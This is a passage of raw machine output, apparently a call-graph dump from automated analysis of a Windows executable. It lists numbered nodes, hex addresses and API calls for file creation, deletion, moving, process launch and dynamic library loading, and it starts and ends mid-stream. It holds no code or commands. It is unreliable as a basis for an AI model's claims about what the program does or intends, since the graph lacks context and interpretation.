EnterCriticalSection 23192->23235 23236 5bb33f LeaveCriticalSection _abort 23192->23236 23193->23151 23196->23192 23237 5b3dd6 23197->23237 23200 5baf4e 23202 5baf53 GetACP 23200->23202 23203 5baf65 23200->23203 23201 5baf3c GetOEMCP 23201->23203 23202->23203 23203->23154 23204 5b8518 23203->23204 23205 5b8556 23204->23205 23209 5b8526 ___FrameUnwindToState 23204->23209 23248 5b895a 20 API calls __dosmaperr 23205->23248 23207 5b8541 RtlAllocateHeap 23208 5b8554 23207->23208 23207->23209 23208->23157 23211 5bb350 23208->23211 23209->23205 23209->23207 23247 5b71ad 7 API calls 2 library calls 23209->23247 23212 5baf1b 40 API calls 23211->23212 23213 5bb36f 23212->23213 23214 5bb376 23213->23214 23216 5bb3e5 ___scrt_fastfail 23213->23216 23218 5bb3c0 IsValidCodePage 23213->23218 23215 5aec4a TranslatorGuardHandler 5 API calls 23214->23215 23217 5bb1ea 23215->23217 23249 5baff4 GetCPInfo 23216->23249 23217->23161 23217->23164 23218->23214 23219 5bb3d2 GetCPInfo 23218->23219 23219->23214 23219->23216 23221->23157 23223 5b84e9 RtlFreeHeap 23222->23223 23227 5b8512 _free 23222->23227 23224 5b84fe 23223->23224 23223->23227 23332 5b895a 20 API calls __dosmaperr 23224->23332 23226 5b8504 GetLastError 23226->23227 23227->23154 23228->23157 23229->23172 23230->23173 23231->23178 23232->23183 23235->23192 23236->23192 23238 5b3df3 23237->23238 23239 5b3de9 23237->23239 23238->23239 23240 5b8fa5 pre_c_initialization 38 API calls 23238->23240 23239->23200 23239->23201 23241 5b3e14 23240->23241 23245 5b90fa 38 API calls __fassign 23241->23245 23243 5b3e2d 23246 5b9127 38 API calls __fassign 23243->23246 23245->23243 23246->23239 23247->23209 23248->23208 23250 5bb02e 23249->23250 23258 5bb0d8 23249->23258 23259 5bc099 23250->23259 23253 5aec4a TranslatorGuardHandler 5 API calls 23255 5bb184 23253->23255 23255->23214 23257 5ba275 __vswprintf_c_l 43 API calls 23257->23258 23258->23253 23260 5b3dd6 __fassign 38 API calls 23259->23260 23261 5bc0b9 MultiByteToWideChar 23260->23261 23263 5bc18f 23261->23263 23264 5bc0f7 23261->23264 23265 5aec4a TranslatorGuardHandler 5 API calls 23263->23265 23266 5b8518 __vswprintf_c_l 21 API calls 23264->23266 23269 5bc118 __vsnwprintf_l ___scrt_fastfail 23264->23269 23267 5bb08f 23265->23267 23266->23269 23273 5ba275 23267->23273 23268 5bc189 23278 5ba2c0 20 API calls _free 23268->23278 23269->23268 23271 5bc15d MultiByteToWideChar 23269->23271 23271->23268 23272 5bc179 GetStringTypeW 23271->23272 23272->23268 23274 5b3dd6 __fassign 38 API calls 23273->23274 23275 5ba288 23274->23275 23279 5ba058 23275->23279 23278->23263 23281 5ba073 __vswprintf_c_l 23279->23281 23280 5ba099 MultiByteToWideChar 23282 5ba0c3 23280->23282 23283 5ba24d 23280->23283 23281->23280 23286 5b8518 __vswprintf_c_l 21 API calls 23282->23286 23289 5ba0e4 __vsnwprintf_l 23282->23289 23284 5aec4a TranslatorGuardHandler 5 API calls 23283->23284 23285 5ba260 23284->23285 23285->23257 23286->23289 23287 5ba12d MultiByteToWideChar 23288 5ba199 23287->23288 23290 5ba146 23287->23290 23315 5ba2c0 20 API calls _free 23288->23315 23289->23287 23289->23288 23306 5ba72c 23290->23306 23294 5ba1a8 23296 5b8518 __vswprintf_c_l 21 API calls 23294->23296 23301 5ba1c9 __vsnwprintf_l 23294->23301 23295 5ba170 23295->23288 23298 5ba72c __vswprintf_c_l 11 API calls 23295->23298 23296->23301 23297 5ba23e 23314 5ba2c0 20 API calls _free 23297->23314 23298->23288 23299 5ba72c __vswprintf_c_l 11 API calls 23302 5ba21d 23299->23302 23301->23297 23301->23299 23302->23297 23303 5ba22c WideCharToMultiByte 23302->23303 23303->23297 23304 5ba26c 23303->23304 23316 5ba2c0 20 API calls _free 23304->23316 23317 5ba458 23306->23317 23310 5ba79c LCMapStringW 23311 5ba75c 23310->23311 23312 5aec4a TranslatorGuardHandler 5 API calls 23311->23312 23313 5ba15d 23312->23313 23313->23288 23313->23294 23313->23295 23314->23288 23315->23283 23316->23288 23318 5ba488 23317->23318 23322 5ba484 23317->23322 23318->23311 23324 5ba7b4 10 API calls 3 library calls 23318->23324 23319 5ba4a8 23319->23318 23321 5ba4b4 GetProcAddress 23319->23321 23323 5ba4c4 __crt_fast_encode_pointer 23321->23323 23322->23318 23322->23319 23325 5ba4f4 23322->23325 23323->23318 23324->23310 23326 5ba515 LoadLibraryExW 23325->23326 23330 5ba50a 23325->23330 23327 5ba54a 23326->23327 23328 5ba532 GetLastError 23326->23328 23327->23330 23331 5ba561 FreeLibrary 23327->23331 23328->23327 23329 5ba53d LoadLibraryExW 23328->23329 23329->23327 23330->23322 23331->23330 23332->23226 23435 5ae360 23333->23435 23336 5a00f0 GetProcAddress 23339 5a0109 23336->23339 23340 5a0121 GetProcAddress 23336->23340 23337 5a0154 23338 5a0484 GetModuleFileNameW 23337->23338 23446 5b70dd 42 API calls __vsnwprintf_l 23337->23446 23353 5a04a3 23338->23353 23339->23340 23340->23337 23341 5a0133 23340->23341 23341->23337 23343 5a03be 23343->23338 23344 5a03c9 GetModuleFileNameW CreateFileW 23343->23344 23345 5a0478 CloseHandle 23344->23345 23346 5a03fc SetFilePointer 23344->23346 23345->23338 23346->23345 23347 5a040c ReadFile 23346->23347 23347->23345 23350 5a042b 23347->23350 23350->23345 23352 5a0085 2 API calls 23350->23352 23351 5a04d2 CompareStringW 23351->23353 23352->23350 23353->23351 23354 5a0508 GetFileAttributesW 23353->23354 23355 5a0520 23353->23355 23437 59acf5 23353->23437 23440 5a0085 23353->23440 23354->23353 23354->23355 23356 5a052a 23355->23356 23359 5a0560 23355->23359 23358 5a0542 GetFileAttributesW 23356->23358 23360 5a055a 23356->23360 23357 5a066f 23381 5a9da4 GetCurrentDirectoryW 23357->23381 23358->23356 23358->23360 23359->23357 23361 59acf5 GetVersionExW 23359->23361 23360->23359 23362 5a057a 23361->23362 23363 5a0581 23362->23363 23364 5a05e7 23362->23364 23366 5a0085 2 API calls 23363->23366 23365 59400a _swprintf 51 API calls 23364->23365 23367 5a060f AllocConsole 23365->23367 23368 5a058b 23366->23368 23369 5a061c GetCurrentProcessId AttachConsole 23367->23369 23370 5a0667 ExitProcess 23367->23370 23371 5a0085 2 API calls 23368->23371 23450 5b35b3 23369->23450 23373 5a0595 23371->23373 23447 59ddd1 23373->23447 23374 5a063d GetStdHandle WriteConsoleW Sleep FreeConsole 23374->23370 23377 59400a _swprintf 51 API calls 23378 5a05c3 23377->23378 23379 59ddd1 53 API calls 23378->23379 23380 5a05d2 23379->23380 23380->23370 23381->23028 23383 5a0085 2 API calls 23382->23383 23384 5aa349 OleInitialize 23383->23384 23385 5aa36c GdiplusStartup SHGetMalloc 23384->23385 23385->23030 23387 5a13d7 IsDBCSLeadByte 23386->23387 23387->23387 23388 5a13ef 23387->23388 23388->23032 23390 5abc8e 23389->23390 23391 5a179d CharUpperW 23390->23391 23392 5abda4 23390->23392 23475 59ecad 80 API calls ___scrt_fastfail 23390->23475 23391->23390 23392->23041 23392->23042 23395 5ae360 23394->23395 23396 5ad294 SetEnvironmentVariableW 23395->23396 23397 5ad2b7 23396->23397 23398 5ad2df 23397->23398 23399 5ad2d3 SetEnvironmentVariableW 23397->23399 23398->23035 23399->23398 23476 593fdd 23400->23476 23403 5aaded LoadBitmapW 23404 5aae0e 23403->23404 23405 5aae15 23403->23405 23510 5a9e1c FindResourceW 23404->23510 23407 5aae2a 23405->23407 23408 5aae1b GetObjectW 23405->23408 23505 5a9d1a 23407->23505 23408->23407 23411 5aae80 23422 59d31c 23411->23422 23412 5aae5c 23526 5a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23412->23526 23413 5a9e1c 13 API calls 23415 5aae4d 23413->23415 23415->23412 23417 5aae53 DeleteObject 23415->23417 23416 5aae64 23527 5a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23416->23527 23417->23412 23419 5aae6d 23528 5a9f5d 8 API calls ___scrt_fastfail 23419->23528 23421 5aae74 DeleteObject 23421->23411 23539 59d341 23422->23539 23424 59d328 23579 59da4e GetModuleHandleW FindResourceW 23424->23579 23427 5a8835 23678 5ae24a 23427->23678 23431 5aa3cc GdiplusShutdown CoUninitialize 23430->23431 23431->23070 23433->23060 23434->23068 23436 5a00d9 GetModuleHandleW 23435->23436 23436->23336 23436->23337 23438 59ad09 GetVersionExW 23437->23438 23439 59ad45 23437->23439 23438->23439 23439->23353 23441 5ae360 23440->23441 23442 5a0092 GetSystemDirectoryW 23441->23442 23443 5a00aa 23442->23443 23444 5a00c8 23442->23444 23445 5a00bb LoadLibraryW 23443->23445 23444->23353 23445->23444 23446->23343 23452 59ddff 23447->23452 23451 5b35bb 23450->23451 23451->23374 23451->23451 23458 59d28a 23452->23458 23455 59ddfc 23455->23377 23456 59de22 LoadStringW 23456->23455 23457 59de39 LoadStringW 23456->23457 23457->23455 23463 59d1c3 23458->23463 23460 59d2a7 23461 59d2bc 23460->23461 23471 59d2c8 26 API calls 23460->23471 23461->23455 23461->23456 23464 59d1de 23463->23464 23470 59d1d7 _strncpy 23463->23470 23465 59d202 23464->23465 23472 5a1596 WideCharToMultiByte 23464->23472 23469 59d233 23465->23469 23473 59dd6b 50 API calls __vsnprintf 23465->23473 23474 5b58d9 26 API calls 3 library calls 23469->23474 23470->23460 23471->23461 23472->23465 23473->23469 23474->23470 23475->23390 23477 593ff4 __vsnwprintf_l 23476->23477 23480 5b5759 23477->23480 23483 5b3837 23480->23483 23484 5b385f 23483->23484 23485 5b3877 23483->23485 23500 5b895a 20 API calls __dosmaperr 23484->23500 23485->23484 23487 5b387f 23485->23487 23489 5b3dd6 __fassign 38 API calls 23487->23489 23488 5b3864 23501 5b8839 26 API calls ___std_exception_copy 23488->23501 23491 5b388f 23489->23491 23502 5b3da1 20 API calls 2 library calls 23491->23502 23492 5aec4a TranslatorGuardHandler 5 API calls 23494 593ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23492->23494 23494->23403 23495 5b3907 23503 5b4186 51 API calls 3 library calls 23495->23503 23498 5b3912 23504 5b3e59 20 API calls _free 23498->23504 23499 5b386f 23499->23492 23500->23488 23501->23499 23502->23495 23503->23498 23504->23499 23529 5a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23505->23529 23507 5a9d21 23508 5a9d2d 23507->23508 23530 5a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23507->23530 23508->23411 23508->23412 23508->23413 23511 5a9e3e SizeofResource 23510->23511 23512 5a9e70 23510->23512 23511->23512 23513 5a9e52 LoadResource 23511->23513 23512->23405 23513->23512 23514 5a9e63 LockResource 23513->23514 23514->23512 23515 5a9e77 GlobalAlloc 23514->23515 23515->23512 23516 5a9e92 GlobalLock 23515->23516 23517 5a9f21 GlobalFree 23516->23517 23518 5a9ea1 __vsnwprintf_l 23516->23518 23517->23512 23519 5a9ea9 CreateStreamOnHGlobal 23518->23519 23520 5a9f1a GlobalUnlock 23519->23520 23521 5a9ec1 23519->23521 23520->23517 23531 5a9d7b GdipAlloc 23521->23531 23524 5a9f05 23524->23520 23525 5a9eef GdipCreateHBITMAPFromBitmap 23525->23524 23526->23416 23527->23419 23528->23421 23529->23507 23530->23508 23532 5a9d9a 23531->23532 23533 5a9d8d 23531->23533 23532->23520 23532->23524 23532->23525 23535 5a9b0f 23533->23535 23536 5a9b30 GdipCreateBitmapFromStreamICM 23535->23536 23537 5a9b37 GdipCreateBitmapFromStream 23535->23537 23538 5a9b3c 23536->23538 23537->23538 23538->23532 23540 59d34b _wcschr __EH_prolog 23539->23540 23541 59d37a GetModuleFileNameW 23540->23541 23542 59d3ab 23540->23542 23543 59d394 23541->23543 23581 5999b0 23542->23581 23543->23542 23545 59d407 23592 5b5a90 26 API calls 3 library calls 23545->23592 23549 59d3db 23549->23545 23551 5a3781 76 API calls 23549->23551 23563 59d627 23549->23563 23550 59d41a 23593 5b5a90 26 API calls 3 library calls 23550->23593 23551->23549 23553 59d563 23553->23563 23618 599d30 77 API calls 23553->23618 23557 59d57d ___std_exception_copy 23558 599bf0 80 API calls 23557->23558 23557->23563 23561 59d5a6 ___std_exception_copy 23558->23561 23560 59d42c 23560->23553 23560->23563 23594 599e40 23560->23594 23609 599bf0 23560->23609 23617 599d30 77 API calls 23560->23617 23561->23563 23576 59d5b2 ___std_exception_copy 23561->23576 23619 5a137a MultiByteToWideChar 23561->23619 23602 599653 23563->23602 23564 59d72b 23620 59ce72 76 API calls 23564->23620 23566 59da0a 23625 59ce72 76 API calls 23566->23625 23568 59d9fa 23568->23424 23569 59d771 23621 5b5a90 26 API calls 3 library calls 23569->23621 23571 59d742 23571->23569 23573 5a3781 76 API calls 23571->23573 23572 59d78b 23622 5b5a90 26 API calls 3 library calls 23572->23622 23573->23571 23575 5a1596 WideCharToMultiByte 23575->23576 23576->23563 23576->23564 23576->23566 23576->23568 23576->23575 23623 59dd6b 50 API calls __vsnprintf 23576->23623 23624 5b58d9 26 API calls 3 library calls 23576->23624 23580 59d32f 23579->23580 23580->23427 23582 5999ba 23581->23582 23583 599a39 CreateFileW 23582->23583 23584 599a59 GetLastError 23583->23584 23585 599aaa 23583->23585 23626 59b66c 23584->23626 23587 599ae1 23585->23587 23589 599ac7 SetFileTime 23585->23589 23587->23549 23588 599a79 23588->23585 23590 599a7d CreateFileW GetLastError 23588->23590 23589->23587 23591 599aa1 23590->23591 23591->23585 23592->23550 23593->23560 23595 599e64 SetFilePointer 23594->23595 23596 599e53 23594->23596 23597 599e9d 23595->23597 23598 599e82 GetLastError 23595->23598 23596->23597 23639 596fa5 75 API calls 23596->23639 23597->23560 23598->23597 23599 599e8c 23598->23599 23599->23597 23640 596fa5 75 API calls 23599->23640 23603 599688 23602->23603 23604 599677 23602->23604 23603->23424 23604->23603 23605 59968a 23604->23605 23606 599683 23604->23606 23646 5996d0 23605->23646 23641 599817 23606->23641 23611 599bfc 23609->23611 23613 599c03 23609->23613 23611->23560 23612 599c9e 23612->23611 23673 596f6b 75 API calls 23612->23673 23613->23611 23613->23612 23615 599cc0 23613->23615 23661 59984e 23613->23661 23615->23611 23616 59984e 5 API calls 23615->23616 23616->23615 23617->23560 23618->23557 23619->23576 23620->23571 23621->23572 23622->23563 23623->23576 23624->23576 23625->23568 23627 59b679 23626->23627 23635 59b683 23627->23635 23636 59b806 CharUpperW 23627->23636 23629 59b692 23637 59b832 CharUpperW 23629->23637 23631 59b6a1 23632 59b71c GetCurrentDirectoryW 23631->23632 23633 59b6a5 23631->23633 23632->23635 23638 59b806 CharUpperW 23633->23638 23635->23588 23636->23629 23637->23631 23638->23635 23639->23595 23640->23597 23642 599820 23641->23642 23643 599824 23641->23643 23642->23603 23643->23642 23652 59a12d 23643->23652 23647 5996dc 23646->23647 23648 5996fa 23646->23648 23647->23648 23650 5996e8 CloseHandle 23647->23650 23649 599719 23648->23649 23660 596e3e 74 API calls 23648->23660 23649->23603 23650->23648 23653 5ae360 23652->23653 23654 59a13a DeleteFileW 23653->23654 23655 59a14d 23654->23655 23656 59984c 23654->23656 23657 59b66c 2 API calls 23655->23657 23656->23603 23658 59a161 23657->23658 23658->23656 23659 59a165 DeleteFileW 23658->23659 23659->23656 23660->23649 23662 59985c GetStdHandle 23661->23662 23663 599867 ReadFile 23661->23663 23662->23663 23664 599880 23663->23664 23672 5998a0 23663->23672 23674 599989 23664->23674 23666 599887 23667 5998a8 GetLastError 23666->23667 23668 5998b7 23666->23668 23671 599895 23666->23671 23667->23668 23667->23672 23670 5998c7 GetLastError 23668->23670 23668->23672 23669 59984e GetFileType 23669->23672 23670->23671 23670->23672 23671->23669 23672->23613 23673->23611 23675 59998f 23674->23675 23676 599992 GetFileType 23674->23676 23675->23666 23677 5999a0 23676->23677 23677->23666 23679 5ae24f ___std_exception_copy 23678->23679 23680 5a8854 23679->23680 23684 5b71ad 7 API calls 2 library calls 23679->23684 23685 5aecce RaiseException __CxxThrowException@8 new 23679->23685 23686 5aecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23679->23686 23680->23054 23684->23679 23688 5b7430 ___FrameUnwindToState 23687->23688 23689 5b757e _abort GetModuleHandleW 23688->23689 23696 5b7448 23688->23696 23691 5b743c 23689->23691 23691->23696 23721 5b75c2 GetModuleHandleExW 23691->23721 23695 5b74c5 23700 5b74dd 23695->23700 23704 5b81f1 _abort 5 API calls 23695->23704 23709 5ba3f1 EnterCriticalSection 23696->23709 23697 5b7450 23697->23695 23708 5b74ee 23697->23708 23729 5b7f30 20 API calls _abort 23697->23729 23698 5b750b 23713 5b753d 23698->23713 23699 5b7537 23730 5c1a19 5 API calls TranslatorGuardHandler 23699->23730 23705 5b81f1 _abort 5 API calls 23700->23705 23704->23700 23705->23708 23710 5b752e 23708->23710 23709->23697 23731 5ba441 LeaveCriticalSection 23710->23731 23712 5b7507 23712->23698 23712->23699 23732 5ba836 23713->23732 23716 5b756b 23719 5b75c2 _abort 8 API calls 23716->23719 23717 5b754b GetPEB 23717->23716 23718 5b755b GetCurrentProcess TerminateProcess 23717->23718 23718->23716 23720 5b7573 ExitProcess 23719->23720 23722 5b760f 23721->23722 23723 5b75ec GetProcAddress 23721->23723 23725 5b761e 23722->23725 23726 5b7615 FreeLibrary 23722->23726 23724 5b7601 23723->23724 23724->23722 23727 5aec4a TranslatorGuardHandler 5 API calls 23725->23727 23726->23725 23728 5b7628 23727->23728 23728->23696 23729->23695 23731->23712 23733 5ba85b 23732->23733 23737 5ba851 23732->23737 23734 5ba458 pre_c_initialization 5 API calls 23733->23734 23734->23737 23735 5aec4a TranslatorGuardHandler 5 API calls 23736 5b7547 23735->23736 23736->23716 23736->23717 23737->23735 24864 5aacd0 100 API calls 24912 5a19d0 26 API calls std::bad_exception::bad_exception 23740 5910d5 23745 595bd7 23740->23745 23746 595be1 __EH_prolog 23745->23746 23754 59b07d 23746->23754 23748 595bed 23760 595dcc GetCurrentProcess GetProcessAffinityMask 23748->23760 23755 59b087 __EH_prolog 23754->23755 23761 59ea80 80 API calls 23755->23761 23757 59b099 23762 59b195 23757->23762 23761->23757 23763 59b1a7 ___scrt_fastfail 23762->23763 23766 5a0948 23763->23766 23769 5a0908 GetCurrentProcess GetProcessAffinityMask 23766->23769 23770 59b10f 23769->23770 23770->23748 24865 5aa8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24866 5aeac0 27 API calls pre_c_initialization 24916 5bebc1 21 API calls __vswprintf_c_l 24917 5a97c0 10 API calls 24868 5b9ec0 21 API calls 24918 5bb5c0 GetCommandLineA GetCommandLineW 23789 5ae1f9 23790 5ae203 23789->23790 23791 5adf59 ___delayLoadHelper2@8 19 API calls 23790->23791 23792 5ae210 23791->23792 24921 5aebf7 20 API calls 23816 5aaee0 23817 5aaeea __EH_prolog 23816->23817 23979 59130b 23817->23979 23820 5ab5cb 24044 5acd2e 23820->24044 23821 5aaf2c 23823 5aaf39 23821->23823 23824 5aafa2 23821->23824 23852 5aaf18 23821->23852 23827 5aaf3e 23823->23827 23828 5aaf75 23823->23828 23826 5ab041 GetDlgItemTextW 23824->23826 23833 5aafbc 23824->23833 23826->23828 23834 5ab077 23826->23834 23839 59ddd1 53 API calls 23827->23839 23827->23852 23835 5aaf96 KiUserCallbackDispatcher 23828->23835 23828->23852 23829 5ab5e9 SendMessageW 23830 5ab5f7 23829->23830 23831 5ab600 SendDlgItemMessageW 23830->23831 23832 5ab611 GetDlgItem SendMessageW 23830->23832 23831->23832 24062 5a9da4 GetCurrentDirectoryW 23832->24062 23838 59ddd1 53 API calls 23833->23838 23837 5ab08f GetDlgItem 23834->23837 23977 5ab080 23834->23977 23835->23852 23841 5ab0a4 SendMessageW SendMessageW 23837->23841 23842 5ab0c5 SetFocus 23837->23842 23843 5aafde SetDlgItemTextW 23838->23843 23844 5aaf58 23839->23844 23840 5ab641 GetDlgItem 23845 5ab65e 23840->23845 23846 5ab664 SetWindowTextW 23840->23846 23841->23842 23847 5ab0d5 23842->23847 23864 5ab0ed 23842->23864 23848 5aafec 23843->23848 24082 591241 SHGetMalloc 23844->24082 23845->23846 24063 5aa2c7 GetClassNameW 23846->24063 23851 59ddd1 53 API calls 23847->23851 23848->23852 23858 5aaff9 GetMessageW 23848->23858 23857 5ab0df 23851->23857 23853 5aaf5f 23853->23852 23859 5aaf63 SetDlgItemTextW 23853->23859 23854 5ab56b 23855 59ddd1 53 API calls 23854->23855 23860 5ab57b SetDlgItemTextW 23855->23860 24083 5acb5a 23857->24083 23858->23852 23863 5ab010 IsDialogMessageW 23858->23863 23859->23852 23867 5ab58f 23860->23867 23863->23848 23865 5ab01f TranslateMessage DispatchMessageW 23863->23865 23866 59ddd1 53 API calls 23864->23866 23865->23848 23870 5ab124 23866->23870 23871 59ddd1 53 API calls 23867->23871 23869 5ab0e6 23989 59a04f 23869->23989 23873 59400a _swprintf 51 API calls 23870->23873 23874 5ab5b8 23871->23874 23872 5ab6af 23877 5ab6df 23872->23877 23878 59ddd1 53 API calls 23872->23878 23879 5ab136 23873->23879 23880 59ddd1 53 API calls 23874->23880 23876 5abdf5 98 API calls 23876->23872 23884 5abdf5 98 API calls 23877->23884 23927 5ab797 23877->23927 23882 5ab6c2 SetDlgItemTextW 23878->23882 23883 5acb5a 16 API calls 23879->23883 23880->23852 23888 59ddd1 53 API calls 23882->23888 23883->23869 23889 5ab6fa 23884->23889 23885 5ab847 23890 5ab859 23885->23890 23891 5ab850 EnableWindow 23885->23891 23886 5ab17f 23995 5aa322 SetCurrentDirectoryW 23886->23995 23887 5ab174 GetLastError 23887->23886 23894 5ab6d6 SetDlgItemTextW 23888->23894 23899 5ab70c 23889->23899 23915 5ab731 23889->23915 23895 5ab876 23890->23895 24101 5912c8 GetDlgItem EnableWindow 23890->24101 23891->23890 23893 5ab195 23896 5ab19e GetLastError 23893->23896 23897 5ab1ac 23893->23897 23894->23877 23898 5ab89d 23895->23898 23907 5ab895 SendMessageW 23895->23907 23896->23897 23906 5ab227 23897->23906 23911 5ab237 23897->23911 23912 5ab1c4 GetTickCount 23897->23912 23898->23852 23908 59ddd1 53 API calls 23898->23908 24099 5a9635 32 API calls 23899->24099 23900 5ab78a 23903 5abdf5 98 API calls 23900->23903 23902 5ab86c 24102 5912c8 GetDlgItem EnableWindow 23902->24102 23903->23927 23910 5ab46c 23906->23910 23906->23911 23907->23898 23914 5ab8b6 SetDlgItemTextW 23908->23914 23909 5ab725 23909->23915 24004 5912e6 GetDlgItem ShowWindow 23910->24004 23917 5ab24f GetModuleFileNameW 23911->23917 23918 5ab407 23911->23918 23919 59400a _swprintf 51 API calls 23912->23919 23913 5ab825 24100 5a9635 32 API calls 23913->24100 23914->23852 23915->23900 23922 5abdf5 98 API calls 23915->23922 24093 59eb3a 80 API calls 23917->24093 23918->23828 23931 59ddd1 53 API calls 23918->23931 23925 5ab1dd 23919->23925 23921 59ddd1 53 API calls 23921->23927 23928 5ab75f 23922->23928 23923 5ab47c 24005 5912e6 GetDlgItem ShowWindow 23923->24005 23996 59971e 23925->23996 23926 5ab844 23926->23885 23927->23885 23927->23913 23927->23921 23928->23900 23932 5ab768 DialogBoxParamW 23928->23932 23930 5ab275 23934 59400a _swprintf 51 API calls 23930->23934 23935 5ab41b 23931->23935 23932->23828 23932->23900 23933 5ab486 23936 59ddd1 53 API calls 23933->23936 23937 5ab297 CreateFileMappingW 23934->23937 23938 59400a _swprintf 51 API calls 23935->23938 23940 5ab490 SetDlgItemTextW 23936->23940 23941 5ab2f9 GetCommandLineW 23937->23941 23973 5ab376 __vsnwprintf_l 23937->23973 23942 5ab439 23938->23942 24006 5912e6 GetDlgItem ShowWindow 23940->24006 23946 5ab30a 23941->23946 23955 59ddd1 53 API calls 23942->23955 23943 5ab203 23947 5ab20a GetLastError 23943->23947 23948 5ab215 23943->23948 23944 5ab381 ShellExecuteExW 23968 5ab39e 23944->23968 24094 5aab2e SHGetMalloc 23946->24094 23947->23948 23949 599653 79 API calls 23948->23949 23949->23906 23950 5ab4a2 SetDlgItemTextW GetDlgItem 23952 5ab4bf GetWindowLongW SetWindowLongW 23950->23952 23953 5ab4d7 23950->23953 23952->23953 24007 5abdf5 23953->24007 23954 5ab326 24095 5aab2e SHGetMalloc 23954->24095 23955->23828 23958 5ab332 24096 5aab2e SHGetMalloc 23958->24096 23960 5abdf5 98 API calls 23963 5ab4f3 23960->23963 23962 5ab3e1 23962->23918 23967 5ab3f7 UnmapViewOfFile CloseHandle 23962->23967 24032 5ad0f5 23963->24032 23964 5ab33e 24097 59ecad 80 API calls ___scrt_fastfail 23964->24097 23967->23918 23968->23962 23971 5ab3cd Sleep 23968->23971 23970 5ab355 MapViewOfFile 23970->23973 23971->23962 23971->23968 23972 5abdf5 98 API calls 23976 5ab519 23972->23976 23973->23944 23974 5ab542 24098 5912c8 GetDlgItem EnableWindow 23974->24098 23976->23974 23978 5abdf5 98 API calls 23976->23978 23977->23828 23977->23854 23978->23974 23980 59136d 23979->23980 23983 591314 23979->23983 24104 59da71 GetWindowLongW SetWindowLongW 23980->24104 23982 59137a 23982->23820 23982->23821 23982->23852 23983->23982 24103 59da98 62 API calls 2 library calls 23983->24103 23985 591336 23985->23982 23986 591349 GetDlgItem 23985->23986 23986->23982 23987 591359 23986->23987 23987->23982 23988 59135f SetWindowTextW 23987->23988 23988->23982 23993 59a059 23989->23993 23990 59a113 23990->23886 23990->23887 23991 59a0ea 23991->23990 23992 59a207 9 API calls 23991->23992 23992->23990 23993->23990 23993->23991 24105 59a207 23993->24105 23995->23893 23997 599728 23996->23997 23998 599792 CreateFileW 23997->23998 23999 599786 23997->23999 23998->23999 24000 5997e4 23999->24000 24001 59b66c 2 API calls 23999->24001 24000->23943 24002 5997cb 24001->24002 24002->24000 24003 5997cf CreateFileW 24002->24003 24003->24000 24004->23923 24005->23933 24006->23950 24008 5abdff __EH_prolog 24007->24008 24009 5ab4e5 24008->24009 24137 5aaa36 24008->24137 24009->23960 24011 5abe36 _wcsrchr 24011->24009 24013 5aaa36 ExpandEnvironmentStringsW 24011->24013 24014 5ac11d SetWindowTextW 24011->24014 24019 5abf0b SetFileAttributesW 24011->24019 24024 5ac2e7 GetDlgItem SetWindowTextW SendMessageW 24011->24024 24027 5ac327 SendMessageW 24011->24027 24141 5a17ac CompareStringW 24011->24141 24142 5a9da4 GetCurrentDirectoryW 24011->24142 24144 59a52a 7 API calls 24011->24144 24145 59a4b3 FindClose 24011->24145 24146 5aab9a 76 API calls ___std_exception_copy 24011->24146 24147 5b35de 24011->24147 24013->24011 24014->24011 24020 5abfc5 GetFileAttributesW 24019->24020 24031 5abf25 ___scrt_fastfail 24019->24031 24020->24011 24023 5abfd7 DeleteFileW 24020->24023 24023->24011 24025 5abfe8 24023->24025 24024->24011 24026 59400a _swprintf 51 API calls 24025->24026 24028 5ac008 GetFileAttributesW 24026->24028 24027->24011 24028->24025 24029 5ac01d MoveFileW 24028->24029 24029->24011 24030 5ac035 MoveFileExW 24029->24030 24030->24011 24031->24011 24031->24020 24143 59b4f7 52 API calls 2 library calls 24031->24143 24033 5ad0ff __EH_prolog 24032->24033 24162 59fead 24033->24162 24035 5ad130 24166 595c59 24035->24166 24037 5ad14e 24170 597c68 24037->24170 24041 5ad1a1 24187 597cfb 24041->24187 24043 5ab504 24043->23972 24045 5acd38 24044->24045 24046 5a9d1a 4 API calls 24045->24046 24047 5acd3d 24046->24047 24048 5ab5d1 24047->24048 24049 5acd45 GetWindow 24047->24049 24048->23829 24048->23830 24049->24048 24052 5acd65 24049->24052 24050 5acd72 GetClassNameW 24631 5a17ac CompareStringW 24050->24631 24052->24048 24052->24050 24053 5acdfa GetWindow 24052->24053 24054 5acd96 GetWindowLongW 24052->24054 24053->24048 24053->24052 24054->24053 24055 5acda6 SendMessageW 24054->24055 24055->24053 24056 5acdbc GetObjectW 24055->24056 24632 5a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24056->24632 24058 5acdd3 24633 5a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24058->24633 24634 5a9f5d 8 API calls ___scrt_fastfail 24058->24634 24061 5acde4 SendMessageW DeleteObject 24061->24053 24062->23840 24064 5aa2e8 24063->24064 24065 5aa30d 24063->24065 24635 5a17ac CompareStringW 24064->24635 24069 5aa7c3 24065->24069 24067 5aa2fb 24067->24065 24068 5aa2ff FindWindowExW 24067->24068 24068->24065 24070 5aa7cd __EH_prolog 24069->24070 24071 591380 82 API calls 24070->24071 24072 5aa7ef 24071->24072 24636 591f4f 24072->24636 24075 5aa818 24078 591951 126 API calls 24075->24078 24076 5aa809 24077 591631 84 API calls 24076->24077 24080 5aa814 24077->24080 24079 5aa83a __vsnwprintf_l ___std_exception_copy 24078->24079 24079->24080 24081 591631 84 API calls 24079->24081 24080->23872 24080->23876 24081->24080 24082->23853 24084 5aac74 5 API calls 24083->24084 24085 5acb66 GetDlgItem 24084->24085 24086 5acb88 24085->24086 24087 5acbbc SendMessageW SendMessageW 24085->24087 24092 5acb93 ShowWindow SendMessageW SendMessageW 24086->24092 24088 5acbf8 24087->24088 24089 5acc17 SendMessageW SendMessageW SendMessageW 24087->24089 24088->24089 24090 5acc4a SendMessageW 24089->24090 24091 5acc6d SendMessageW 24089->24091 24090->24091 24091->23869 24092->24087 24093->23930 24094->23954 24095->23958 24096->23964 24097->23970 24098->23977 24099->23909 24100->23926 24101->23902 24102->23895 24103->23985 24104->23982 24106 59a214 24105->24106 24107 59a238 24106->24107 24109 59a22b CreateDirectoryW 24106->24109 24126 59a180 24107->24126 24109->24107 24111 